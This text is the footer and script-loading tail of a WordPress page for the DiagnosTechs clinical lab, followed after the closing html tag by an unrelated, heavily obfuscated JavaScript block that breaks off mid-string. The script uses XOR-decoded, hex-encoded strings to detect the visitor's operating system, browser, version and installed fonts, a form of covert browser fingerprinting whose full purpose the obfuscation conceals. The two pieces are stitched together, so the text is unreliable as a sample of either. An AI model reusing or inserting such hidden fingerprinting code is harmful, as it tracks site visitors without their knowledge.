vc_row-fluid vc_row-no-padding"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbdd9c1")); }</script><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="clearboth"></div><div class="gem-divider gem-divider-style-3" style="border-color: #ffffff;"></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbe16b1" data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_custom_1529033357930"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbe16b1")); }</script><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center wpb_animate_when_almost_visible wpb_slideInLeft slideInLeft"> <figure class="wpb_wrapper vc_figure"> <a href="http://www.doh.wa.gov/" target="_blank" class="vc_single_image-wrapper vc_box_border_grey"><img width="193" height="114" src="https://www.diagnostechs.com/wp-content/uploads/2018/06/banner-certificate-p1.jpg" class="vc_single_image-img attachment-full" alt="Washington State Department of Health" /></a> </figure> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center wpb_animate_when_almost_visible wpb_slideInLeft slideInLeft"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.jointcommission.org/" target="_blank" class="vc_single_image-wrapper vc_box_border_grey"><img width="190" height="114" src="https://www.diagnostechs.com/wp-content/uploads/2018/06/banner-certificate-p2.jpg" class="vc_single_image-img attachment-full" alt="Joint Commission Accredited" /></a> </figure> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center wpb_animate_when_almost_visible wpb_slideInRight slideInRight"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.fda.gov/MedicalDevices/DeviceRegulationandGuidance/IVDRegulatoryAssistance/ucm124105.htm" target="_blank" class="vc_single_image-wrapper vc_box_border_grey"><img width="183" height="114" src="https://www.diagnostechs.com/wp-content/uploads/2018/06/banner-certificate-p3.jpg" class="vc_single_image-img attachment-full" alt="CLIA Certified" /></a> </figure> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center wpb_animate_when_almost_visible wpb_slideInRight slideInRight"> <figure class="wpb_wrapper vc_figure"> <a href="http://www.ndnr.com/" target="_blank" class="vc_single_image-wrapper vc_box_border_grey"><img width="175" height="114" src="https://www.diagnostechs.com/wp-content/uploads/2018/06/banner-certificate-p4.jpg" class="vc_single_image-img attachment-full" alt="NDNR Award Winner" /></a> </figure> </div> </div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbe16b1" data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_row-no-padding"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbe16b1")); }</script><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="clearboth"></div><div class="gem-divider " style="border-color: #ffffff;"></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div> </div><!-- .entry-content --> </article><!-- #post-## --> </div> </div> </div> </div><!-- .block-content --> </div><!-- #main-content --> </div><!-- #main --> <div id="lazy-loading-point"></div> <footer class="custom-footer"><div class="container"><div id="vc_row-5cdd8fcbe53a2" class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_wp_custommenu wpb_content_element footer-menu-section"><div class="widget widget_nav_menu"><h2 class="widgettitle">Providers</h2><div class="menu-footer-providers-container"><ul id="menu-footer-providers" class="menu"><li id="menu-item-29140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29140"><a href="https://www.diagnostechs.com/providers-2/become-a-provider/">Become a Provider</a></li> <li id="menu-item-29347" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29347"><a href="https://www.diagnostechs.com/providers/DTIClient/Welcome.aspx">Account Login</a></li> <li id="menu-item-29143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29143"><a href="https://www.diagnostechs.com/providers-2/provider-faq/">Provider FAQ</a></li> <li id="menu-item-29929" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29929"><a target="_blank" href="https://www.diagnostechs.com/wp-content/uploads/2018/06/Provider-Catalog.pdf">Download Provider Catalog</a></li> </ul></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_wp_custommenu wpb_content_element footer-menu-section"><div class="widget widget_nav_menu"><h2 class="widgettitle">Patients</h2><div class="menu-footer-patients-container"><ul id="menu-footer-patients" class="menu"><li id="menu-item-29164" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29164"><a href="https://www.diagnostechs.com/patients/locate-a-provider/">Locate a Provider</a></li> <li id="menu-item-29393" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29393"><a href="https://www.diagnostechs.com/patients/return-a-kit/">Return a Kit</a></li> <li id="menu-item-29166" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29166"><a href="https://www.diagnostechs.com/patients/pay-a-bill/">Pay a Bill</a></li> <li id="menu-item-29167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29167"><a href="https://www.diagnostechs.com/patients/patient-faq/">Patient FAQ</a></li> </ul></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_wp_custommenu wpb_content_element footer-menu-section"><div class="widget widget_nav_menu"><h2 class="widgettitle">About Us</h2><div class="menu-footer-about-us-container"><ul id="menu-footer-about-us" class="menu"><li id="menu-item-29925" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29925"><a href="https://www.diagnostechs.com/about-us/">About DiagnosTechs</a></li> <li id="menu-item-29926" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29926"><a href="https://www.diagnostechs.com/about-us/testimonials/">Testimonials</a></li> <li id="menu-item-29927" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29927"><a href="https://www.diagnostechs.com/about-us/technology/">Technology</a></li> <li id="menu-item-29928" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29928"><a href="https://www.diagnostechs.com/about-us/careers/">Careers</a></li> </ul></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_wp_custommenu wpb_content_element footer-menu-section"><div class="widget widget_nav_menu"><h2 class="widgettitle">Contact Us</h2><div class="menu-footer-contact-us-container"><ul id="menu-footer-contact-us" class="menu"><li id="menu-item-29348" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29348"><a href="https://www.google.com/maps/dir//19110+66th+Avenue+South,+Kent,+WA/@47.429876,-122.2855353,13z/data=!4m9!4m8!1m0!1m5!1m1!1s0x54905c8d307c5bb7:0xb108b0da16f56d59!2m2!1d-122.250516!2d47.4298233!3e0">19110 66th Ave S, Bldg. G, Kent, WA 98032 USA</a></li> <li id="menu-item-29349" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29349"><a href="tel:18008783787">Toll Free: 1-800-878-3787</a></li> <li id="menu-item-29350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29350"><a href="tel:+14252510596">Office: +1 425-251-0596</a></li> </ul></div></div></div><div class="socials socials-list socials-colored-hover socials-rounded socials-alignment-center"><a class="socials-item" target="_blank" href="https://www.facebook.com/diagnostechs/" style="color: #ffffff;"><i class="socials-item-icon facebook" style="font-size: 26px"></i></a><a class="socials-item" target="_blank" href="https://twitter.com/diagnostechs" style="color: #ffffff;"><i class="socials-item-icon twitter" style="font-size: 26px"></i></a><a class="socials-item" target="_blank" href="https://www.linkedin.com/company/diagnos-techs-inc/" style="color: #ffffff;"><i class="socials-item-icon linkedin" style="font-size: 26px"></i></a></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p style="text-align: center;"><span style="font-family: helvetica, arial, sans-serif;"><a href="https://www.diagnostechs.com/site-policies">Site Policies</a>    |    <a href="https://www.diagnostechs.com/sitemap">Sitemap</a></span></p> <p style="text-align: center;"><span style="font-family: helvetica, arial, sans-serif;">© 1987-2019 All Rights Reserved, DiagnosTechs&#x2122;, Inc.</span></p> </div> </div> </div></div></div></div> </div></footer> </div><!-- #page --> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <link rel='stylesheet' id='animate-css-css' href='https://www.diagnostechs.com/wp-content/plugins/js_composer/assets/lib/bower/animate-css/animate.min.css?ver=5.7' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://www.diagnostechs.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/wp-mediaelement.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-blog-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-blog.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-additional-blog-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-additional-blog.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-blog-timeline-new-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-blog-timeline-new.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-animations-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-itemsAnimations.css?ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/jquery.dlmenu.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var thegem_dlmenu_settings = {"backLabel":"Back","showCurrentLabel":"Show this page"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-menu_init.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/svg4everybody.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-form-elements.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/jquery.easing.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-header.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-lazyLoading.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/jquery.transform.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/jquery/ui/effect-drop.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/odometer.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-sticky.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/functions.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/fancyBox/jquery.mousewheel.pack.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/fancyBox/jquery.fancybox.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/fancyBox/jquery.fancybox-init.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-vc_elements_init.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.diagnostechs.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.7'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/jquery.parallaxVertical.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/quickfinders-effects.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/js_composer/assets/lib/waypoints/waypoints.min.js?ver=5.7'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-itemsAnimations.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/jquery.touchSwipe.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/jquery.carouFredSel.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-scrollMonitor.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-gallery.js?ver=5.1.1'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive","hideVideoControlsOnLoad":"1","audioVolume":"vertical"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-mediaelement.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-blog.js?ver=5.1.1'></script> </body> </html>
1
var td_3A=td_3A||{};td_3A.td_3K=function(td_B,td_Y){var td_u=[""];var td_k=0;for(var td_V=0;td_V<td_Y.length;++td_V){td_u.push(String.fromCharCode(td_B.charCodeAt(td_k)^td_Y.charCodeAt(td_V)));td_k++;if(td_k>=td_B.length){td_k=0; }}return td_u.join("");};td_3A.td_0j=function(td_E){this.td_c=td_E;this.td_d="";this.td_f=function(td_I,td_r){if(0===this.td_d.length){var td_y=this.td_c.substr(0,32);var td_R="";for(var td_o=32;td_o<td_E.length; td_o+=2){td_R+=String.fromCharCode(parseInt(td_E.substr(td_o,2),16));}this.td_d=td_3A.td_3K(td_y,td_R);}return this.td_d.substr(td_I,td_r);};};td_3A.td_1g=function(td_o){if(td_o===null||td_o.length===null){return null; }var td_R=null;try{var td_h="";var td_q=[];var td_H=String.fromCharCode(48)+String.fromCharCode(48)+String.fromCharCode(48);for(var td_x=0;td_x<td_o.length;++td_x){var td_Z=(td_H+td_o.charCodeAt(td_x)).slice(-3); td_q.push(td_Z);}var td_r=td_q.join("");for(td_x=0;td_x<td_r.length;++td_x){var td_L=String.fromCharCode(65+td_x);if(td_L!==[][[]]+""){td_h+=td_L;}}td_R=td_3A.td_3K(td_h,td_r);}catch(td_i){return null; }return td_R;};td_3A.td_3k=function(td_F){if(td_F===null||td_F.length===null){return null;}var td_J="";try{var td_Y="";for(var td_H=0;td_H<td_F.length;++td_H){var td_n=String.fromCharCode(65+td_H);if(td_n!==[][[]]+""){td_Y+=td_n; }}var td_U=td_3A.td_3K(td_Y,td_F);var td_Q=td_U.match(/.{1,3}/g);for(td_H=0;td_H<td_Q.length;++td_H){td_J+=String.fromCharCode(parseInt(td_Q[td_H],10));}}catch(td_M){return null;}return td_J;};td_3A.tdz_03387d09e58a4305bf0c0361634685f7=new td_3A.td_0j("\x30\x33\x33\x38\x37\x64\x30\x39\x65\x35\x38\x61\x34\x33\x30\x35\x62\x66\x30\x63\x30\x33\x36\x31\x36\x33\x34\x36\x38\x35\x66\x37\x34\x37\x35\x61\x35\x64\x35\x63\x35\x38\x31\x33\x34\x33\x34\x65\x30\x63\x35\x62\x35\x31\x31\x31\x35\x63\x35\x63\x35\x65\x35\x30\x34\x64\x30\x66\x34\x30\x30\x63\x35\x34\x35\x61\x35\x39\x34\x32\x35\x62\x35\x32\x35\x37\x35\x39\x35\x61\x35\x66\x30\x33\x35\x34\x34\x34\x35\x66\x35\x61\x35\x36\x34\x32\x31\x63\x35\x31\x35\x37\x30\x31\x34\x37\x35\x37\x30\x38\x35\x30\x35\x36\x34\x38\x34\x35\x30\x65\x30\x39\x34\x32\x30\x36\x34\x32\x35\x61\x35\x33"); function td_gJ(td_3z){var td_Mh=td_3z.toLowerCase();if(td_Mh===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(0,7)){td_Mh=td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(7,3);}else{if(td_Mh===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(10,11)||td_Mh===Number(333541).toString(26)){td_Mh=td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(21,3); }}this.os_name=td_Mh;this._eq=function(td_3z){return(td_3z===this.os_name);};this._ne=function(td_3z){return(td_3z!==this.os_name);};this._gt=function(td_3z){return(this.os_name>td_3z);};this._ge=function(td_3z){return(this.os_name>=td_3z); };this._lt=function(td_3z){return(this.os_name<td_3z);};this._le=function(td_3z){return(this.os_name<=td_3z);};this._in=function(td_3z){var td_K0=(td_Mh.constructor===String?[td_Mh]:td_Mh);var td_tU;for(td_tU=0; td_tU<td_K0.length;td_tU++){if(this.os_name===td_K0[td_tU]){return true;}}return false;};this.getFontsList=function(){if(this.os_name===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(24,3)){return(typeof(td_2V)===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(27,6)?td_2V:[]); }if(this.os_name===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(33,5)){return(typeof(td_0R)===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(27,6)?td_0R:[]);}if(this.os_name===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(7,3)){return(typeof(td_3X)===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(27,6)?td_3X:[]); }if(this.os_name===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(21,3)){return(typeof(td_2k)===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(27,6)?td_2k:[]);}if(this.os_name===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(38,7)){return(typeof(td_1X)===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(27,6)?td_1X:[]); }else{return[];}};}function td_uT(td_0J){var td_e3=td_0J.toLowerCase();if(td_e3===td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(45,8)){td_e3=td_3A.tdz_03387d09e58a4305bf0c0361634685f7.td_f(53,2);}this.browser_name=td_e3; this._eq=function(td_0J){return(td_0J===this.browser_name);};this._ne=function(td_0J){return(td_0J!==this.browser_name);};this._in=function(td_0J){var td_hC=(td_0J.constructor===String?[td_0J]:td_0J);var td_nT; for(td_nT=0;td_nT<td_hC.length;td_nT++){if(this.browser_name===td_hC[td_nT]){return true;}}return false;};}function td_a1(td_b7){this.version=td_b7;this._eq=function(td_Dm){return(this.version===parseInt(td_Dm)); };this._ne=function(td_Ox){return(this.version!==parseInt(td_Ox));};this._gt=function(td_I3){return(this.version>parseInt(td_I3));};this._ge=function(td_tQ){return(this.version>=parseInt(td_tQ));};this._lt=function(td_Mo){return(this.version<parseInt(td_Mo)); };this._le=function(td_Kw){return(this.version<=parseInt(td_Kw));};}td_3A.tdz_ca4d9a0e31944610bed02a0e2bbd5cd9=new td_3A.td_0j("\x63\x61\x34\x64\x39\x61\x30\x65\x33\x31\x39\x34\x34\x36\x31\x30\x62\x65\x64\x30\x32\x61\x30\x65\x32\x62\x62\x64\x35\x63\x64\x39\x32\x63\x33\x31\x36\x36\x32\x62\x34\x39\x30\x34\x34\x32\x30\x34\x37\x63\x34\x31\x35\x63\x34\x36\x35\x35\x31\x36\x37\x63\x35\x39\x30\x63\x30\x63\x32\x31\x35\x34\x35\x35\x30\x34\x37\x35\x31\x64\x34\x32\x30\x65\x30\x64\x31\x36\x35\x30\x31\x31\x33\x64\x35\x38\x32\x31\x31\x33\x35\x62\x31\x33\x34\x61\x30\x34\x34\x32\x33\x63\x35\x32\x35\x66\x35\x64\x35\x31\x34\x63\x37\x35\x35\x39\x34\x32\x30\x64\x30\x38\x30\x31\x37\x66\x35\x66\x30\x66\x35\x39\x33\x32\x35\x37\x30\x30\x32\x64\x30\x39\x35\x62\x30\x61\x33\x33\x35\x63\x30\x31\x34\x65\x37\x32\x31\x63\x35\x30\x32\x65\x36\x33\x32\x33\x35\x61\x34\x33\x35\x63\x35\x32\x35\x62\x34\x65\x37\x32\x34\x32\x30\x62\x32\x61\x33\x37\x36\x38\x35\x62\x30\x30\x35\x66\x32\x38\x35\x62\x34\x64\x32\x66\x30\x64\x34\x30\x30\x61\x32\x36\x34\x62\x30\x63\x31\x36\x34\x37\x30\x31\x34\x62\x32\x30\x34\x30\x31\x35\x35\x66\x35\x34\x36\x61\x35\x35\x35\x32\x35\x37\x34\x33\x35\x39\x33\x34\x30\x30\x31\x36\x34\x33\x35\x62\x30\x65\x35\x65\x30\x63\x37\x31\x30\x33\x30\x30\x32\x66\x37\x31\x32\x36\x32\x66\x35\x36\x30\x64\x31\x30\x34\x31\x30\x31\x34\x62\x30\x65\x34\x32\x32\x36\x35\x32\x35\x63\x35\x30\x35\x61\x35\x62\x37\x38\x35\x34\x34\x34\x31\x31\x30\x36\x30\x35\x34\x30\x35\x37\x32\x63\x36\x33\x32\x63\x37\x37\x32\x62\x32\x37\x32\x39\x35\x61\x30\x31\x30\x64\x35\x35\x30\x36\x33\x35\x34\x36\x30\x64\x35\x64\x30\x34\x35\x65\x31\x31\x34\x31\x34\x37\x37\x65\x35\x31\x35\x37\x35\x64\x35\x65\x37\x64\x30\x64\x31\x66\x30\x64\x35\x63\x35\x65\x30\x30\x36\x37\x30\x63\x35\x63\x33\x35\x30\x62\x30\x61\x35\x31\x30\x63\x31\x33\x34\x61\x32\x65\x30\x30\x35\x37\x33\x33\x35\x30\x30\x66\x35\x34\x30\x61\x34\x34\x34\x32\x31\x39\x36\x34\x35\x63\x35\x39\x35\x66\x35\x35\x32\x33\x30\x62\x30\x30\x34\x32\x35\x64\x30\x38\x35\x34\x32\x61\x34\x32\x30\x37\x30\x63\x32\x36\x36\x36\x32\x37\x33\x37\x34\x63\x30\x64\x32\x65\x36\x37\x32\x38\x35\x30\x30\x66\x34\x35\x31\x64\x31\x33\x35\x30\x34\x62\x35\x39\x34\x32\x30\x31\x35\x64\x37\x63\x30\x62\x30\x62\x31\x31\x34\x38\x37\x30\x30\x64\x35\x31\x30\x36\x35\x39\x32\x30\x30\x37\x31\x36\x34\x37\x31\x61\x30\x64\x36\x39\x30\x62\x30\x65\x35\x61\x30\x31\x35\x30\x33\x31\x35\x38\x30\x61\x35\x64\x35\x34\x31\x36\x35\x64\x36\x34\x35\x39\x35\x35\x35\x39\x33\x32\x30\x34\x30\x30\x37\x63\x35\x62\x30\x66\x34\x35\x31\x64\x31\x32\x30\x33\x31\x30\x30\x39\x37\x39\x30\x61\x30\x61\x34\x63\x31\x62\x34\x31\x35\x35\x30\x35\x34\x62\x30\x32\x35\x38\x33\x32\x35\x61\x35\x66\x35\x64\x35\x62\x34\x33\x34\x35\x31\x31\x30\x31\x35\x32\x33\x32\x30\x64\x35\x65\x35\x36\x30\x65\x34\x37\x31\x36\x31\x32\x35\x61\x34\x63\x35\x35\x36\x32\x30\x61\x30\x61\x35\x64\x30\x63\x31\x36\x34\x37\x34\x34\x30\x31\x33\x36\x35\x39\x30\x62\x35\x37\x35\x65\x34\x65\x34\x37\x31\x34\x30\x31\x36\x36\x35\x39\x30\x63\x30\x31\x30\x62\x34\x37\x34\x31\x34\x31\x36\x36\x30\x63\x34\x31\x31\x36\x30\x33\x33\x33\x35\x63\x30\x64\x30\x30\x35\x36\x31\x34\x31\x32\x31\x34\x33\x37\x35\x63\x31\x33\x34\x36\x30\x30\x34\x31\x31\x31\x30\x62\x30\x34\x30\x34\x30\x35\x36\x36\x35\x39\x30\x63\x30\x31\x30\x62\x34\x37\x34\x31\x34\x31\x36\x38\x33\x35\x36\x35\x30\x62\x30\x63\x30\x30\x35\x61\x31\x34\x31\x37\x31\x39\x35\x31\x35\x31\x30\x34\x35\x34\x36\x65\x30\x38\x35\x65\x30\x31\x35\x63\x34\x36\x34\x61\x31\x34\x37\x39\x37\x33\x36\x36\x35\x39\x30\x63\x30\x31\x30\x62\x34\x37\x34\x31\x34\x31\x30\x39\x35\x64\x36\x35\x30\x62\x30\x63\x30\x30\x35\x61\x31\x34\x31\x37\x31\x39\x35\x61\x35\x34\x36\x33\x30\x64\x35\x37\x30\x35\x35\x66\x31\x32\x34\x30\x31\x31\x37\x37\x36\x30\x31\x34\x30\x32\x31\x66\x30\x30\